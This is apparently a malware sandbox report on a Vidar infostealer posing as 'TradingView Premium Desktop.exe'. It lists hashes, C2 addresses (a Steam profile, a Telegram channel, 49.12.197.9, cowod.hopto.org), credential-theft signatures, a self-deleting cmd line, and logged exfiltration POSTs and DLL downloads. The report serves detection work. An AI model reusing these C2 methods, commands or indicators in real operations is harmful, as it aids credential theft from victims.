Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    90s
  • max time network
    130s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/10/2024, 02:20 UTC

General

  • Target

    TradingView Premium Desktop.exe

  • Size

    782.1MB

  • MD5

    a44c11ff27b4350c9e4d368cd6ae4583

  • SHA1

    9f5de149596e55a9b3560f3e162ce29d18c87f30

  • SHA256

    311c992c91b94c32e6bdb543da6944a2c3c4ee45305416f2d5d9c4a96eb05099

  • SHA512

    4cf4e9fbb39f24a1eabcbfe3e07cbfff568a62b27cb7587dd6bb466270b2c4d5673fb6ecaeb277bdf5d639e361bd33e396c1bab1c97e569e1d9c7180cc193f28

  • SSDEEP

    98304:NCVtEz6jrCmBJ9jQeXGuzTdodTqVcfK6mkzfV9F2QNL4AXAtVo7:Ncw1y3zZoJK6mEdD2DAQE7

Malware Config

Extracted

Family

vidar

Version

11

Botnet

dd3c663b33910bd77937a09a739dc3d6

C2

https://steamcommunity.com/profiles/76561199780418869

https://t.me/ae5ed

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0

Signatures

  • Detect Vidar Stealer 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\TradingView Premium Desktop.exe
    "C:\Users\Admin\AppData\Local\Temp\TradingView Premium Desktop.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4420
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBGIJEHIIDGC" & exit
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:404
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 10
        3⤵
        • System Location Discovery: System Language Discovery
        • Delays execution with timeout.exe
        PID:4496

Network

  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    196.249.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    196.249.167.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    0.205.248.87.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    0.205.248.87.in-addr.arpa
    IN PTR
    Response
    0.205.248.87.in-addr.arpa
    IN PTR
    https-87-248-205-0lgwllnwnet
  • flag-us
    DNS
    0.205.248.87.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    0.205.248.87.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    0.205.248.87.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    0.205.248.87.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    76.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    76.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    76.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    76.32.126.40.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    76.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    76.32.126.40.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    steamcommunity.com
    TradingView Premium Desktop.exe
    Remote address:
    8.8.8.8:53
    Request
    steamcommunity.com
    IN A
    Response
    steamcommunity.com
    IN A
    104.82.234.109
  • flag-gb
    GET
    https://steamcommunity.com/profiles/76561199780418869
    TradingView Premium Desktop.exe
    Remote address:
    104.82.234.109:443
    Request
    GET /profiles/76561199780418869 HTTP/1.1
    Host: steamcommunity.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache
    Date: Sat, 05 Oct 2024 02:21:49 GMT
    Content-Length: 34935
    Connection: keep-alive
    Set-Cookie: sessionid=b7da2e7fb2668108cd9e8f94; Path=/; Secure; SameSite=None
    Set-Cookie: steamCountry=GB%7Ce15d564837abb028acb4e114150d704d; Path=/; Secure; HttpOnly; SameSite=None
  • flag-us
    DNS
    109.234.82.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    109.234.82.104.in-addr.arpa
    IN PTR
    Response
    109.234.82.104.in-addr.arpa
    IN PTR
    a104-82-234-109deploystaticakamaitechnologiescom
  • flag-de
    GET
    https://49.12.197.9/
    TradingView Premium Desktop.exe
    Remote address:
    49.12.197.9:443
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 05 Oct 2024 02:21:50 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://49.12.197.9/
    TradingView Premium Desktop.exe
    Remote address:
    49.12.197.9:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----GDGDHJJDGHCAAAKEHIJK
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Content-Length: 256
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 05 Oct 2024 02:21:51 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    9.197.12.49.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    9.197.12.49.in-addr.arpa
    IN PTR
    Response
    9.197.12.49.in-addr.arpa
    IN PTR
    static91971249clients your-serverde
  • flag-de
    POST
    https://49.12.197.9/
    TradingView Premium Desktop.exe
    Remote address:
    49.12.197.9:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----DGHIDHCAAKECGCBFIJDB
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 05 Oct 2024 02:21:51 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://49.12.197.9/
    TradingView Premium Desktop.exe
    Remote address:
    49.12.197.9:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----EBGCBAFCGDAAKFIDGIEG
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 05 Oct 2024 02:21:52 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://49.12.197.9/
    TradingView Premium Desktop.exe
    Remote address:
    49.12.197.9:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----GIDAECGDAFBAAAAAECGI
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Content-Length: 332
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 05 Oct 2024 02:21:52 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://49.12.197.9/
    TradingView Premium Desktop.exe
    Remote address:
    49.12.197.9:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AKKKECBKKECGCAAAEHJK
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Content-Length: 4601
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 05 Oct 2024 02:21:53 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://49.12.197.9/
    TradingView Premium Desktop.exe
    Remote address:
    49.12.197.9:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----KJEGDBKFIJDAKFIDGHJE
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Content-Length: 437
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 05 Oct 2024 02:21:54 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://49.12.197.9/
    TradingView Premium Desktop.exe
    Remote address:
    49.12.197.9:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHC
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Content-Length: 437
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 05 Oct 2024 02:21:55 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    GET
    https://49.12.197.9/freebl3.dll
    TradingView Premium Desktop.exe
    Remote address:
    49.12.197.9:443
    Request
    GET /freebl3.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 05 Oct 2024 02:21:55 GMT
    Content-Type: application/octet-stream
    Content-Length: 685392
    Connection: keep-alive
    Last-Modified: Saturday, 05-Oct-2024 02:21:55 GMT
    Cache-Control: no-store, no-cache
    Accept-Ranges: bytes
  • flag-de
    GET
    https://49.12.197.9/mozglue.dll
    TradingView Premium Desktop.exe
    Remote address:
    49.12.197.9:443
    Request
    GET /mozglue.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 05 Oct 2024 02:21:55 GMT
    Content-Type: application/octet-stream
    Content-Length: 608080
    Connection: keep-alive
    Last-Modified: Saturday, 05-Oct-2024 02:21:55 GMT
    Cache-Control: no-store, no-cache
    Accept-Ranges: bytes
  • flag-de
    GET
    https://49.12.197.9/msvcp140.dll
    TradingView Premium Desktop.exe
    Remote address:
    49.12.197.9:443
    Request
    GET /msvcp140.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 05 Oct 2024 02:21:56 GMT
    Content-Type: application/octet-stream
    Content-Length: 450024
    Connection: keep-alive
    Last-Modified: Saturday, 05-Oct-2024 02:21:56 GMT
    Cache-Control: no-store, no-cache
    Accept-Ranges: bytes
  • flag-de
    GET
    https://49.12.197.9/softokn3.dll
    TradingView Premium Desktop.exe
    Remote address:
    49.12.197.9:443
    Request
    GET /softokn3.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 05 Oct 2024 02:21:56 GMT
    Content-Type: application/octet-stream
    Content-Length: 257872
    Connection: keep-alive
    Last-Modified: Saturday, 05-Oct-2024 02:21:56 GMT
    Cache-Control: no-store, no-cache
    Accept-Ranges: bytes
  • flag-de
    GET
    https://49.12.197.9/vcruntime140.dll
    TradingView Premium Desktop.exe
    Remote address:
    49.12.197.9:443
    Request
    GET /vcruntime140.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 05 Oct 2024 02:21:56 GMT
    Content-Type: application/octet-stream
    Content-Length: 80880
    Connection: keep-alive
    Last-Modified: Saturday, 05-Oct-2024 02:21:56 GMT
    Cache-Control: no-store, no-cache
    Accept-Ranges: bytes
  • flag-de
    GET
    https://49.12.197.9/nss3.dll
    TradingView Premium Desktop.exe
    Remote address:
    49.12.197.9:443
    Request
    GET /nss3.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 05 Oct 2024 02:21:56 GMT
    Content-Type: application/octet-stream
    Content-Length: 2046288
    Connection: keep-alive
    Last-Modified: Saturday, 05-Oct-2024 02:21:56 GMT
    Cache-Control: no-store, no-cache
    Accept-Ranges: bytes
  • flag-de
    POST
    https://49.12.197.9/
    TradingView Premium Desktop.exe
    Remote address:
    49.12.197.9:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----KFIDAFBFBKFHJJKEHIEG
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 05 Oct 2024 02:21:57 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://49.12.197.9/
    TradingView Premium Desktop.exe
    Remote address:
    49.12.197.9:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----GDHCGDGIEBKJKFHJJKFC
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 05 Oct 2024 02:21:58 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://49.12.197.9/
    TradingView Premium Desktop.exe
    Remote address:
    49.12.197.9:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----HDGIJJDGCBKFIDHIEBKE
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Content-Length: 117969
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 05 Oct 2024 02:21:59 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://49.12.197.9/
    TradingView Premium Desktop.exe
    Remote address:
    49.12.197.9:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----GDGDHJJDGHCAAAKEHIJK
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 05 Oct 2024 02:22:00 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    cowod.hopto.org
    TradingView Premium Desktop.exe
    Remote address:
    8.8.8.8:53
    Request
    cowod.hopto.org
    IN A
    Response
    cowod.hopto.org
    IN A
    45.132.206.251
  • flag-ru
    POST
    http://cowod.hopto.org/
    TradingView Premium Desktop.exe
    Remote address:
    45.132.206.251:80
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----GDGDHJJDGHCAAAKEHIJK
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: cowod.hopto.org
    Content-Length: 1973
    Connection: Keep-Alive
    Cache-Control: no-cache
  • flag-us
    DNS
    251.206.132.45.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    251.206.132.45.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    209.205.72.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.205.72.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    53.210.109.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    53.210.109.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    18.31.95.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.31.95.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.214.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.214.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    48.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    48.229.111.52.in-addr.arpa
    IN PTR
    Response
  • 104.82.234.109:443
    https://steamcommunity.com/profiles/76561199780418869
    tls, http
    TradingView Premium Desktop.exe
    2.2kB
    42.5kB
    39
    37

    HTTP Request

    GET https://steamcommunity.com/profiles/76561199780418869

    HTTP Response

    200
  • 49.12.197.9:443
    https://49.12.197.9/
    tls, http
    TradingView Premium Desktop.exe
    958 B
    2.7kB
    11
    8

    HTTP Request

    GET https://49.12.197.9/

    HTTP Response

    200
  • 49.12.197.9:443
    https://49.12.197.9/
    tls, http
    TradingView Premium Desktop.exe
    1.4kB
    622 B
    9
    6

    HTTP Request

    POST https://49.12.197.9/

    HTTP Response

    200
  • 49.12.197.9:443
    https://49.12.197.9/
    tls, http
    TradingView Premium Desktop.exe
    1.5kB
    2.2kB
    10
    7

    HTTP Request

    POST https://49.12.197.9/

    HTTP Response

    200
  • 49.12.197.9:443
    https://49.12.197.9/
    tls, http
    TradingView Premium Desktop.exe
    1.6kB
    6.4kB
    13
    10

    HTTP Request

    POST https://49.12.197.9/

    HTTP Response

    200
  • 49.12.197.9:443
    https://49.12.197.9/
    tls, http
    TradingView Premium Desktop.exe
    1.4kB
    672 B
    9
    6

    HTTP Request

    POST https://49.12.197.9/

    HTTP Response

    200
  • 49.12.197.9:443
    https://49.12.197.9/
    tls, http
    TradingView Premium Desktop.exe
    5.9kB
    565 B
    13
    6

    HTTP Request

    POST https://49.12.197.9/

    HTTP Response

    200
  • 49.12.197.9:443
    tls
    TradingView Premium Desktop.exe
    92.5kB
    2.5MB
    1836
    1831
  • 49.12.197.9:443
    https://49.12.197.9/
    tls, http
    TradingView Premium Desktop.exe
    1.5kB
    565 B
    9
    6

    HTTP Request

    POST https://49.12.197.9/

    HTTP Response

    200
  • 49.12.197.9:443
    https://49.12.197.9/
    tls, http
    TradingView Premium Desktop.exe
    1.5kB
    565 B
    9
    6

    HTTP Request

    POST https://49.12.197.9/

    HTTP Response

    200
  • 49.12.197.9:443
    https://49.12.197.9/freebl3.dll
    tls, http
    TradingView Premium Desktop.exe
    24.4kB
    707.6kB
    517
    514

    HTTP Request

    GET https://49.12.197.9/freebl3.dll

    HTTP Response

    200
  • 49.12.197.9:443
    https://49.12.197.9/mozglue.dll
    tls, http
    TradingView Premium Desktop.exe
    21.7kB
    627.8kB
    458
    455

    HTTP Request

    GET https://49.12.197.9/mozglue.dll

    HTTP Response

    200
  • 49.12.197.9:443
    https://49.12.197.9/msvcp140.dll
    tls, http
    TradingView Premium Desktop.exe
    16.3kB
    464.7kB
    341
    338

    HTTP Request

    GET https://49.12.197.9/msvcp140.dll

    HTTP Response

    200
  • 49.12.197.9:443
    https://49.12.197.9/softokn3.dll
    tls, http
    TradingView Premium Desktop.exe
    9.8kB
    266.6kB
    199
    196

    HTTP Request

    GET https://49.12.197.9/softokn3.dll

    HTTP Response

    200
  • 49.12.197.9:443
    https://49.12.197.9/vcruntime140.dll
    tls, http
    TradingView Premium Desktop.exe
    3.7kB
    84.0kB
    68
    65

    HTTP Request

    GET https://49.12.197.9/vcruntime140.dll

    HTTP Response

    200
  • 49.12.197.9:443
    https://49.12.197.9/nss3.dll
    tls, http
    TradingView Premium Desktop.exe
    71.3kB
    2.1MB
    1534
    1531

    HTTP Request

    GET https://49.12.197.9/nss3.dll

    HTTP Response

    200
  • 49.12.197.9:443
    https://49.12.197.9/
    tls, http
    TradingView Premium Desktop.exe
    1.5kB
    2.8kB
    10
    7

    HTTP Request

    POST https://49.12.197.9/

    HTTP Response

    200
  • 49.12.197.9:443
    https://49.12.197.9/
    tls, http
    TradingView Premium Desktop.exe
    1.4kB
    748 B
    9
    6

    HTTP Request

    POST https://49.12.197.9/

    HTTP Response

    200
  • 49.12.197.9:443
    https://49.12.197.9/
    tls, http
    TradingView Premium Desktop.exe
    122.8kB
    2.2kB
    97
    48

    HTTP Request

    POST https://49.12.197.9/

    HTTP Response

    200
  • 49.12.197.9:443
    https://49.12.197.9/
    tls, http
    TradingView Premium Desktop.exe
    1.4kB
    518 B
    8
    5

    HTTP Request

    POST https://49.12.197.9/

    HTTP Response

    200
  • 49.12.197.9:443
    tls
    TradingView Premium Desktop.exe
    1.4kB
    518 B
    8
    5
  • 45.132.206.251:80
    http://cowod.hopto.org/
    http
    TradingView Premium Desktop.exe
    2.5kB
    132 B
    6
    3

    HTTP Request

    POST http://cowod.hopto.org/
  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
    90 B
    1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    196.249.167.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    196.249.167.52.in-addr.arpa

  • 8.8.8.8:53
    0.205.248.87.in-addr.arpa
    dns
    213 B
    116 B
    3
    1

    DNS Request

    0.205.248.87.in-addr.arpa

    DNS Request

    0.205.248.87.in-addr.arpa

    DNS Request

    0.205.248.87.in-addr.arpa

  • 8.8.8.8:53
    76.32.126.40.in-addr.arpa
    dns
    213 B
    157 B
    3
    1

    DNS Request

    76.32.126.40.in-addr.arpa

    DNS Request

    76.32.126.40.in-addr.arpa

    DNS Request

    76.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    219 B
    144 B
    3
    1

    DNS Request

    95.221.229.192.in-addr.arpa

    DNS Request

    95.221.229.192.in-addr.arpa

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    steamcommunity.com
    dns
    TradingView Premium Desktop.exe
    64 B
    80 B
    1
    1

    DNS Request

    steamcommunity.com

    DNS Response

    104.82.234.109

  • 8.8.8.8:53
    109.234.82.104.in-addr.arpa
    dns
    73 B
    139 B
    1
    1

    DNS Request

    109.234.82.104.in-addr.arpa

  • 8.8.8.8:53
    9.197.12.49.in-addr.arpa
    dns
    70 B
    125 B
    1
    1

    DNS Request

    9.197.12.49.in-addr.arpa

  • 8.8.8.8:53
    cowod.hopto.org
    dns
    TradingView Premium Desktop.exe
    61 B
    77 B
    1
    1

    DNS Request

    cowod.hopto.org

    DNS Response

    45.132.206.251

  • 8.8.8.8:53
    251.206.132.45.in-addr.arpa
    dns
    73 B
    134 B
    1
    1

    DNS Request

    251.206.132.45.in-addr.arpa

  • 8.8.8.8:53
    209.205.72.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    209.205.72.20.in-addr.arpa

  • 8.8.8.8:53
    18.31.95.13.in-addr.arpa
    dns
    70 B
    144 B
    1
    1

    DNS Request

    18.31.95.13.in-addr.arpa

  • 8.8.8.8:53
    53.210.109.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    53.210.109.20.in-addr.arpa

  • 8.8.8.8:53
    172.214.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.214.232.199.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    48.229.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    48.229.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\mozglue.dll

    Filesize

    593KB

    MD5

    c8fd9be83bc728cc04beffafc2907fe9

    SHA1

    95ab9f701e0024cedfbd312bcfe4e726744c4f2e

    SHA256

    ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

    SHA512

    fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

  • C:\ProgramData\nss3.dll

    Filesize

    2.0MB

    MD5

    1cc453cdf74f31e4d913ff9c10acdde2

    SHA1

    6e85eae544d6e965f15fa5c39700fa7202f3aafe

    SHA256

    ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

    SHA512

    dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

